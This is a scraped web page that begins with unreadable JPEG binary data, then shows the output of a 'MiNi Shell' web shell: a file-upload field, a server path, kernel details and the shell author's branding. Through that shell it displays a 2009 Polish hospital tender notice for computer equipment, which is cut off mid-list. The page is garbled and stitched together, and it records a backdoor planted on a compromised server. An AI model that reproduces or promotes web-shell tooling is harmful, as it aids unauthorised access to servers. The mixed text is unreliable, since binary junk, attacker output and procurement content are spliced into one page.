JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090521/161394-N-2009.html

<p class="kh_header"><b>Bydgoszcz: Dostawa sprzętu komputerowego wraz z oprogramowaniem oraz innego sprzętu biurowego</b><br>
<b>Numer ogłoszenia: 161394 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Szpital Uniwersytecki Nr 2 im. dr Jana Biziela w Bydgoszczy , ul. Ujejskiego 75, 85-168 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3655352, 3655521, 3655296, faks 052 3655752.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biziel.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego wraz z oprogramowaniem oraz innego sprzętu biurowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu komputerowego wraz z oprogramowaniem oraz innego sprzętu biurowego:

Pozycja 1: Zestaw komputerowy - 100 sztuk     CPV: 30 21 30 00 - 5, 30 21 33 00 - 8
Pozycja 2: Monitor LCD 19 - 100 sztuk     CPV: 30 23 13 10 - 3
Pozycja 3: Drukarka laserowa monochromatyczna - 28 sztuk     30 23 21 10 - 8
Pozycja 4: Drukarka laserowa monochromatyczna sieciowa - 1 sztuka     30 23 21 10 - 8
Pozycja 5: Laserowe urządzenie wielofunkcyjne - 2 sztuki     CPV: 30 23 20 00 - 4
Pozycja 6: Drukarka laserowa monochromatyczna - 8 sztuk     CPV: 30 23 21 10 - 8
Pozycja 7: Oprogramowanie do diagnostyki ( zarządzania siecią ) dla jednostki edukacyjnej - 1 licencja  CPV: 48 21 00 00 - 3
Pozycja 8: Oprogramowanie antywirusowe wraz z licencją dla uczelni - 200 licencji   CPV: 48 76 00 00 - 3; 48 76 00 00 - 0
Pozycja 9: Oprogramowanie biurowe - 50 licencji     CPV: 48 92 00 00 - 3, 48 31 00 00 - 4
Pozycja 10: Oprogramowanie do wykonywania kopii/odzyskiwania/defragmentacji zawartości dysków - 1 licencja     CPV: 48 71 00 00 - 8; 48 73 00 00 - 4; 48 73 10 00 - 1; 48 73 20 00 - 8  
Pozycja 11: Router typu UTM z firewallem - 1 sztuka     CPV: 32 41 31 00 - 2
Pozycja 12: Urządzenie pamięci masowej NAS - 1 sztuka     CPV: 48 82 10 00 - 6; 48 82 30 00 - 3
Pozycja 13: Szafa dystrybucyjna - 1 sztuka, z wyposażeniem obejmującym CPV: 32 42 20 00 - 7
13.1 Serwer nr 1 - 1 sztuka     CPV: 48 82 00 00 - 2; 48 82 10 00 - 9; 48 82 20 00 - 6 
13.2 Serwer nr 2 - 1 sztuka     CPV: 48 82 00 00 - 2; 48 82 10 00 - 9; 48 82 20 00 - 6
13.3 Konsolę zarządzania - 1 sztuka     CPV: 30 23 13 10 - 3
13.4 Konsolę KVM - 1 sztuka     CPV: 32 42 00 00 - 3
13.5 System pamięci masowej - 1 sztuka    CPV: 30 23 30 00 - 1
13.6 Zasilacz awaryjny - 1 sztuka CPV: 35 10 00 00 - 5 
13.7 Przełącznik zarządzalny - 5 sztuk    CPV:  32 42 00 00 - 3
Pozycja 14: Karta zarządzająca SNMP - 1 sztuka    CPV: 32 42 00 00 - 3
Pozycja 15: Konwertery optyczne - 4 sztuki     CPV: 32 42 00 00 - 3
Pozycja 16: Dyski SCSI - 2 sztuki     CPV: 30 23 31 32 - 5
Pozycja 17: Dyski SATA - 3 sztuki     CPV: 30 23 31 32 - 5
Pozycja 18: Dyski IDE - 3 sztuki     CPV: 30 23 31 32 - 5
Pozycja 19: Mysz optyczna PS/2 - 5 sztuk     CPV: 30 23 74 10 - 6
Pozycja 20: Mysz optyczna USB - 5 sztuk     CPV: 30 23 74 10 - 6
Pozycja 21: Klawiatura USB - 5 sztuk     CPV: 30 23 74 60 - 1
Pozycja 22: Klawiatura PS/2 - 5 sztuk     CPV: 30 23 74 60 - 1
Pozycja 23: Pamięć RAM - 1 komplet     CPV: 30 23 61 10 - 6
Pozycja 24: Przełącznik zarządzalny - 5 sztuk    CPV:  32 42 00 00 - 3
Pozycja 25: Sieciowy serwer danych - 1 sztuka     CPV: 48 82 10 00 - 6; 48 82 30 00 - 3
Pozycja 26: Modem G.SHDSL.bis - 2 sztuki     CPV: 32 55 24 10 - 4
Pozycja 27: Tablica suchościeralna - 1 sztuka     CPV: 30 19 59 20 - 7
Pozycja 28: Niszczarka dokumentów - 2 sztuki     CPV: 30 19 14 00 - 8
Pozycja 29: Kable krosowe szare - 210 sztuk     CPV: 32 58 11 10 - 3
Pozycja 30: Kable krosowe czerwone - 30 sztuk     CPV: 32 58 11 10 - 3
Pozycja 31: Kable krosowe szare - 50 sztuk     CPV: 32 58 11 10 - 3
Pozycja 32: Router zintegrowany z bezprzewodowym punktem dostępowym - 2 sztuki     CPV: 32 41 31 00 - 2
Pozycja 33: Drukarka termiczna - 1 sztuka     CPV: 30 23 20 00 - 4
Pozycja 34: Oprogramowanie do obsługi drukarki termicznej - 1 licencja     CPV: 48 42 10 00 - 5
Pozycja 35: Drukarka formatu A2 - 1 sztuka     CPV: 30 23 21 30 - 4
Pozycja 36: Monitor LCD 24 - 1 sztuka     CPV: 30 23 13 10 - 3
Pozycja 37: Skaner formatu A3 - 1 sztuka     CPV: 30 21 61 10 - 0
Pozycja 38: Aparat cyfrowy - 1 sztuka     CPV: 38 65 10 00 - 3
Pozycja 39: Przełącznik 8xLAN - 3 sztuki     CPV:  32 42 00 00 - 3
Pozycja 40: Wizualne środowisko programistyczne RAD - 1 licencja     CPV: 48 61 10 00 - 4
Pozycja 41: Zestaw komponentów dla C++ Builder - 1 licencja    CPV: 48 61 10 00 - 4.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 48.62.00.00-0, 30.19.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> - Wykonawcy muszą spełnić wymagania ustawy Prawo zamówień publicznych oraz specyfikacji istotnych warunków zamówienia.
- Wykonawcy muszą spełniać wymagania określone w art. 22 ust.1 Prawo zamówień publicznych tzn. że:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznymi i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ustawy Prawo zamówień publicznych.

Ocena spełnienia warunków wymaganych od wykonawców dokonana zostanie według formuły spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale III specyfikacji istotnych warunków zamówienia oraz w ogłoszeniu o zamówieniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Zamawiający wymaga, aby Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu dostarczyli następujące dokumenty:
1.1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.2. aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.3. aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

2. Wymagane oświadczenia:
2.1. oświadczenie z art. 22 ust. 1 ustawy Prawo zamówień publicznych,
2.2. oświadczenie z art. 24 ustawy Prawo zamówień publicznych,
2.3. oświadczenie Wykonawcy, że oferowany przedmiot zamówienia spełnia normy oraz posiada odpowiednie certyfikaty wymagane i wymienione w opisie przedmiotu zamówienia,
2.4. oświadczenie o podwykonawcach,
2.5. oświadczenie rejestracyjne

3. Wymagania dodatkowe, gdy kilka podmiotów składa wspólną ofertę:
3.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w tym przypadku ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania.
3.2. W przypadku o którym mowa w pkt. 3.1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego, albo reprezentowania  ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3.3. Jeżeli ofertę składa kilku Wykonawców wspólnie, oferta oraz wszystkie załączniki muszą być podpisane przez pełnomocnika ustanowionego przez tych Wykonawców.
3.4. W przypadku gdy kilku Wykonawców składa ofertę wspólną, do oferty należy załączyć:
a) dokumenty wymienione w pkt.1. ppkt. 1.1., 1.2., 1.3., wystawione indywidualnie dla każdego z Wykonawców oraz oświadczenia z art. 22 ust. 1 i art. 24 ustawy Prawo zamówień publicznych;
b) wspólny formularz ofertowy 
c) informację na temat zakresu uczestnictwa każdego z Wykonawców składających ofertę wspólną w realizacji zamówienia publicznego. 
3.5. Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego umowy współpracy, która musi być podpisana przez osoby uprawnione do reprezentowania wszystkich Wykonawców.

UWAGA:
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa  w pkt. 1 ppkt. 1.1 i 1.3 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w który Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. a, b, c, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: 1. Po dokonaniu czynności oceny złożonych ofert, w celu wyboru najkorzystniejszej oferty przeprowadzona zostanie aukcja elektroniczna, jeżeli w postępowaniu złożone zostaną co najmniej 3 oferty niepodlegające odrzuceniu, zgodnie z art. 91a, ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych( Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.).
2. Kryterium oceny ofert w toku aukcji elektronicznej jest: najniższa cena.
3. Sposób oceny ofert w toku aukcji elektronicznej będzie obejmował przeliczanie postąpień na punktową ocenę oferty, z uwzględnieniem punktacji otrzymanej przed otwarciem aukcji.
4. Adres strony internetowej na której będzie prowadzona aukcja elektroniczna: www.e-przetarg.pl</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.biziel.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego lok.39 za okazaniem dowodu wpłaty dokonanej w kasie Szpitala lub za pobraniem pocztowym lub przy udziale firmy kurierskiej ( plus koszty przesyłki). Cena SIWZ 10 zł brutto...</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 09:00, miejsce: W siedzibie Zamawiającego przy ul. Ujejskiego 75 w Kancelarii Szpitala lok nr 46A..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Miejsce i termin otwarcia ofert: W siedzibie Zamawiającego przy ul. Ujejskiego 75 w świetlica - niski parter, w dniu 29.05.2009 r. o godz. 10:00. tel: (0-52) 36-55-495, 36-55-352 fax: (0-52) 36-55-752. NIP 9532582266. REGON: 340517145. Strona internetowa Zamawiającego: www.biziel.pl. e-mail - przetargi@biziel.pl.Godziny urzędowania: od poniedziałku - piątku w godzinach od 7:30 do 15:00.Nr referencyjny nadany sprawie: NZZ/16/D/09. Osoby uprawnione do kontaktu z wykonawcami: Przemysław Ściesiński - Samodzielna Sekcja Zamówień Publicznych i Zaopatrzenia - nr tel: (052) 36-55-495. Jacek Kryś - tel. (052) 36-55-200 w godz. 7:00 - 15:00 - Samodzielna Sekcja Informatyki. Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. Zamawiający nie przewiduje zamówień uzupełniających.
Dodatkowa informacja dotycząca terminu realizacji przedmiotu zamówienia.
Przedmiot zamówienia musi być zrealizowany w okresie do 42 dni od podpisania umowy. Dostawa przedmiotu umowy będzie się odbywać w 3 partiach.
a. I partia powinna być dostarczona do 14 dni od dnia podpisania umowy i będzie obejmować
- 50 komputerów z pozycji nr 1
- 50 monitorów z pozycji nr 2
- pozostałe pozycje od 3 do 41 z wyłączeniem pozycji nr 13 - Szafa dystrybucyjna 
b. II partia powinna być dostarczona do 28 dni od dnia podpisania umowy i będzie obejmować: 
- pozostałe 50 komputerów z pozycji nr 1
- pozostałe 50 monitorów z pozycji nr 2
c. III partia powinna być dostarczona do 42 dni od dnia podpisania umowy i będzie obejmować:

Creat By MiNi SheLL
Email: jattceo@gmail.com